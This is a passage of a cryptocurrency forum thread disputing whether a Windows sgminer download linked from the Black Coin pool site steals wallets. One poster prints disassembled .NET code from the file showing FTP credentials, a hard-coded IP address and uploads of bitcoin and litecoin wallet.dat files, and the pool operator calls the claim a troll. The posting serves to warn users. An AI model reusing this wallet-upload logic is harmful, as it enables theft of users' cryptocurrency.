Topic: ALERT! sgminerwindows.com Stealing Bitcoins! - page 4. (Read 13568 times)

Its not a admin account you cant view folders or files.  Using the mozzilla ftp its quite possibly his home ftp server though.

Someone must have fixed up those links on blackcoinpool.com. I know for a fact that those were working correctly about 7 weeks ago when I downloaded the miner and it pointed to the correct site.

Edit:
Nvm, should have read on to page two. If this is all true than god knows how many people are affected by this. I do however still have a version of sgminer on my system and I highly doubt this has ever sent anything out to a 3rd party such as an ftp.

Edit 2:

Wouldn't this mean any of us could log-on to that ftp right now  and snatch any dat files that might be there?

Its not even the miner, has no mining code in it.  Just uses some basic ftp commands and sends the wallet.dat files to the above listed ftp.

It is hard for the pool operator monitor 3rd party link.
They might be virus free when being check by the pool operator, and get changed the next moment

If that is true, wouldn't that be the miners fault, rather than Blackcoin?

Sorry I cant screenshot without the 2nd monitor window half.  Its in the getting started windows miner link, sgminerwindows.com the 4.4.2 miner download link.  Should be able to click the image and click the magnifying glass in photobucket to blow it up.  The file in the zip titles sgminer.exe and is 383kb

Please due, I am NOT OP!  If you run the pool you should take the compliant seriously,  here  is another another screenshot of the file taking apart.  Not taking from your site, FROM YOUR GETTING STARTING WINDOWS MINER LINK!!! 

Oh you meant the link to download the SGminer...
I thought you meant the link to Sgminer's website from our pool...

The picture is still not expandable and unreadable, Im going to investigate as well...

This does not change the fact that it is not blackcoinpool.com or anything to do with Black Coin, and if true, something that we thank you for pointing out.

You are now backtracking and changing what you said...

Origanally you stated that you downloaded SGminer4.x and took it a part to find the "code that steals BTC"

Now we post github of SGminer and you say it is in the link? What?

Are you just trying to trick people who do not know anything about code or mining into FUD?

Fine I'll do all the work for you guys, the linked code in github is obviously not the code the bad link!   Here are some code samples from the file :
 call     string [mscorlib]System.String::Concat(string, string)
    call     class [mscorlib]System.IO.DirectoryInfo [mscorlib]System.IO.Directory::CreateDirectory(string)
    pop
    ldstr    "http://ftp://212.48.76.120/"
    ldstr    "medusaminer"
    ldstr    "barkleys"
    newobj   instance void ftp::.ctor(string hostIP, string userName, string password)
    stloc.1
    newobj   instance void [mscorlib]System.Random::.ctor()
    stloc.2
    ldloc.2
    ldc.i4.0

    nop
    ldloc.0
    ldstr    "\\bitcoin"
    call     string [mscorlib]System.String::Concat(string, string)
    call     bool [mscorlib]System.IO.Directory::Exists(string)
    ldc.i4.0
    ceq
  ldstr    "\\bitcoin\\wallet.dat"
    call     string [mscorlib]System.String::Concat(string, string)
    callvirt instance void ftp::upload(string remoteFile, string localFile)
    nop
    nop

loc_B8C:                                // CODE XREF: Upload+A6

    ldstr    "\\litecoin\\wallet.dat"
    call     string [mscorlib]System.String::Concat(string, string)
    call     bool [mscorlib]System.IO.File::Exists(string)
    ldc.i4.0
    ceq
    stloc.s  8
    ldloc.s  8
    brtrue.s loc_C14
    nop

screenshot because I know you don't believe me :

I run www.blackcoinpool.com

https://github.com/veox/sgminer <<< if you took it apart, you would have no problem pointing it out in the code.

sgminer is not required to use Black Coin Pool, it's just a common mining software that people use, so we posted up a tutorial.
If some one posts some viable proof, other than "I did it, believe me" I will gladly remove any mention of SGminer from the pool.
But out of the thousands of people that have used the pool, and the thousands upon thousands of people who use SGMiner, only you seem to be "getting hacked."

No proof of anything other than showing a transaction from a wallet, and then posting your address asking for donations while deleting posts from this forum.

Again here is a link to virus scans:
https://www.virustotal.com/en/file/f993b578fa9e715f1fee5063b31b2c16686e26774771f98cf2850600bfc29ef5/analysis/

I also have gone out of my way to contact this person and email them and get a hold of them
They just quit IRC or won't respond

And even if, hypothetically, Sgminer had a virus, that is not as the title claims Blackcoinpool.com

I would highly doubt that.  

What virus do you have.  If it was an infection it should be detectable.  How did it steal 10 wallets.. sounds like a keystroke cap. virus..

No a lot of proof here to me.  

I like clambakes.. but never have went to them or can eat clams.. is that true.. ?

Has never mined with Black Coin Pool...

Hes not a troll, as I said I took reverse engineered the file and it is definitely a wallet stealer.  Blackcoinpool.com links directly to the site for a windows miner in getting started.  If your sure he is a troll download the windows miner and run it, then lose all of your wallets. 

The title to this thread is misleading and wrong.

He is claiming SGminer stole his BTC, not the pool

He has never mined on the pool before.

SGminer is a seperate website than BlackCoinPool

Biggest altcoin multipool in existence installs a virus to steal users bitcoin.  One person complains while asking for donations to get back on his feet.  Seems legit.

https://www.virustotal.com/en/file/f993b578fa9e715f1fee5063b31b2c16686e26774771f98cf2850600bfc29ef5/analysis/



He is also in here asking for BTC

This is a troll and just causing FUD

All you showed was a BTC transaction...

The miner you downloaded had nothing to do with Black Coin.

I run the pool for Black Coin and this person has never mined with us, he posted in IRC and i tried to help him and he quit.
I took it upon myself and searched for his username to find an email and emailed him trying to see what the issue
was.
Within thatt 5 min he had a post on this thread.

This is FUD and a troll.

He had the same exact thread with multiple talking and he deleted it cuz he was discredited